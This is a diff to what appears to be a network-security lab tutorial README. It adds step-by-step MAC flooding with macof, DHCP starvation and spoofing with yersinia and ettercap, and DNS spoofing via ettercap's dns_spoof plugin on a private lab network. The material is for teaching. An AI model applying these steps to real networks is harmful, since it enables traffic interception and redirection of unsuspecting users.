diff --git a/Tutorial 1/README.md b/Tutorial 1/README.md index 3eef028..2d07f95 100644 --- a/Tutorial 1/README.md +++ b/Tutorial 1/README.md @@ -57,6 +57,8 @@ disable ```sh sudo -i ifconfig eth0 192.168.1.1X netmask 255.255.255.0 +route add default gw 192.168.1.1 +echo "nameserver 208.67.222.222" > /etc/resolv.conf # watch the result using the command below ip addr show ``` @@ -69,3 +71,60 @@ sudo arpspoof -i eth0 -t 192.168.1.11 192.168.1.1 # Spy traffic from router to victim sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.11 ``` + +## MAC Flooding +### Switch Configuration +```sh +enable +clear mac address-table dynamic +``` + +### Kali Linux +```sh +ping 192.168.1.1 +# after the ping we should have 2 Mac addresses in the table +macof +# after the macof we have overflow of mac addresses +``` + +## DHCP Spoofing +```sh +sudo -i +apt install yersinia +``` +### Perform DHCP Starvation +- Start yersinia-graphical +- Select `Launch Attack` +- Select `DHCP` +- Select sending `DISCOVER packet` +- Select `Ok` +- Open ettercap-graphical +- Go to MITM menu +- Select `DHCP Spoofing` +- Set configurations + - IP Pool: 192.168.1.10-192.168.1.20 + - Netmask: 255.255.255.0 + - + +### Disable DHCP +Because DHCP doesn't work on the victim machine, we need to disable it. +```sh +enable +configure terminal +no service dhcp + +``` + +### On victim machine +```sh +ifconfig eth0 0.0.0.0 +dhclient -r +dhclient eth0 +``` + +## DNS Spoofing +- Go to ettercap-graphical +- Start a DHCP Spoofing +- Select configuration as victim (192.168.1.0 255.255.255.0 1.1.1.1) +- Go to Plugins +- Activate `dns_spoof` \ No newline at end of file